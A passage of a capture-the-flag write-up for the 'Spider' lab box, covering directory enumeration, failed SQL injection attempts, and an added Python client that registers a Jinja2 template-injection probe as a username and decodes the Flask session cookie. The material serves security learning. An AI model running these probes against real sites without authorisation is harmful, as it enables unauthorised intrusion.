2 :80 SSTI via /register to /user
http://spider.htb/
Zeta Furniture website
# view source contains
| <!-- We have enabled rate limiting to keep pesky hax0rs from attacking our service. -->
$ gobuster dir -u http://spider.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/login (Status: 200) [Size: 1832]
/register (Status: 200) [Size: 2130]
/main (Status: 302) [Size: 219] [--> http://spider.htb/login]
/index (Status: 200) [Size: 11273]
/user (Status: 302) [Size: 219] [--> http://spider.htb/login]
/view (Status: 302) [Size: 219] [--> http://spider.htb/login]
/cart (Status: 500) [Size: 290]
/logout (Status: 302) [Size: 209] [--> http://spider.htb/]
/checkout (Status: 500) [Size: 290]
# only 2 pages are accessible without logging in
http://spider.htb/login
Admin Login
requires
| Username (UUID given at registration!)
| password
# default creds fail:
| ERROR: Unable to login.
http://spider.htb/register
Register Page
# registering as kashz:kashz
# response
You should be redirected automatically to target URL: <a href="/login?uuid=39643204-192c-4bb8-88d2-61dc81de7510">/login?uuid=39643204-192c-4bb8-88d2-61dc81de7510</a>
# creds
# UUID: 39643204-192c-4bb8-88d2-61dc81de7510
# kashz:kashz
# trying to explore it
http://spider.htb/product-details/1
Chair posted by user 'chiv'. This is a beautiful chair, finest quality, previously owned by Mitnick.
# the other chair links 1-6 are replicas of 1 (white chair) and 2 (black chair)
# running burp intruder over product IDs 1-50
# when running burp intruder and exploring at the same time, we hit the rate limit and get ERROR
Too Many Requests
1 per 1 second
# nothing new in 1-50
http://spider.htb/main > http://spider.htb/login
# nothing new
http://spider.htb/view
This is the messages board.
Current user: kashz
The admin board is empty!
# after logging in we see a new section on the left: user information
http://spider.htb/user
shows our username and UUID
# the subscribe form at the bottom takes a single field
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
email=kashz%40kahsz.com
# tried SQLi, nothing here.
# adding chairs to cart
POST /product-details/1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
quantity=1&new_item=1
# tried SQLi, nothing here.
# removing chair from cart
GET /cart?remove=1 HTTP/1.1
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
# tried SQLi, nothing here.
http://spider.htb/user
shows the username we chose at registration,
# maybe inject that using SSTI via the username field in /register and see whether /user renders it
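Added example for these notes (not code from the original writeup or from the target): helpers for the register -> login -> /user flow described above, with a client that paces itself to the "1 per 1 second" limit the site enforced. It also decodes the data segment of the session cookie captured above, which has the Flask/itsdangerous layout payload.timestamp.signature. Assumptions not confirmed by the notes: the POST field names `username` and `password` on /register and /login, that /user echoes the registered name through Jinja2, and the specific probe string; the cookie decoder only reads the payload and does not verify the signature.

```python
"""Probe helpers for spider.htb (added example; field names and template
engine are assumptions, see the lead-in)."""
import base64
import json
import re
import time
import urllib.error
import urllib.parse
import urllib.request
import zlib
from http.cookiejar import CookieJar
from typing import Optional, Tuple

BASE = "http://spider.htb"
RATE_LIMIT_SECONDS = 1.0                 # site answered "1 per 1 second"
UUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Jinja2 probe (assumed engine): the product is only present if the username
# is compiled as template source rather than rendered as data.
SSTI_PROBE = "{{1337*7}}"
SSTI_EXPECTED = str(1337 * 7)            # "9359"


def extract_uuid(text: str) -> Optional[str]:
    """Return the first UUID found in a registration response (body or Location)."""
    m = UUID_RE.search(text)
    return m.group(0) if m else None


def decode_flask_session_payload(cookie: str) -> dict:
    """Decode (not verify) the data segment of a Flask session cookie.

    Segment 1 is URL-safe base64 JSON without padding; a leading '.' marks a
    zlib-compressed payload. Segments 2 and 3 are the timestamp and HMAC.
    """
    compressed = cookie.startswith(".")
    segment = cookie.lstrip(".").split(".")[0]
    raw = base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def ssti_rendered(user_page_html: str) -> bool:
    """True if /user shows the evaluated probe instead of echoing it back."""
    return SSTI_EXPECTED in user_page_html and SSTI_PROBE not in user_page_html


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s, so the redirect body and Location can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


class PoliteClient:
    """Cookie-aware client that sleeps between requests to stay under the limit."""

    def __init__(self, base: str = BASE):
        self.base = base
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(CookieJar()), _NoRedirect())
        self._last = 0.0

    def _pace(self) -> None:
        wait = RATE_LIMIT_SECONDS - (time.monotonic() - self._last)
        if wait > 0:
            time.sleep(wait)
        self._last = time.monotonic()

    def request(self, path: str, data: Optional[dict] = None) -> Tuple[int, str, str]:
        """Return (status, Location header, body); GET when data is None, else POST.
        3xx/4xx responses are returned instead of raised."""
        self._pace()
        body = urllib.parse.urlencode(data).encode() if data is not None else None
        req = urllib.request.Request(self.base + path, data=body)
        try:
            with self.opener.open(req) as r:
                return r.status, r.headers.get("Location", ""), r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.headers.get("Location", ""), e.read().decode(errors="replace")


def probe_ssti(client: PoliteClient, password: str = "kashz") -> bool:
    """Register the probe as the username, log in with the issued UUID, check /user."""
    status, location, body = client.request(
        "/register", {"username": SSTI_PROBE, "password": password})
    uuid = extract_uuid(location + body)
    if uuid is None:
        raise RuntimeError(f"registration returned status {status} and no UUID")
    client.request("/login", {"username": uuid, "password": password})
    _, _, user_page = client.request("/user")
    return ssti_rendered(user_page)


if __name__ == "__main__":
    print(decode_flask_session_payload(
        "eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo"))
    print("SSTI rendered:", probe_ssti(PoliteClient()))
```

The cookie from the notes decodes to `{"cart_items": []}`, which is why the cart endpoints were worth poking at; the signature segment still stops anyone from writing a new payload without the app's secret key. A probe that evaluates to a distinctive number is preferable to `{{7*7}}` because "49" can appear in a page for unrelated reasons.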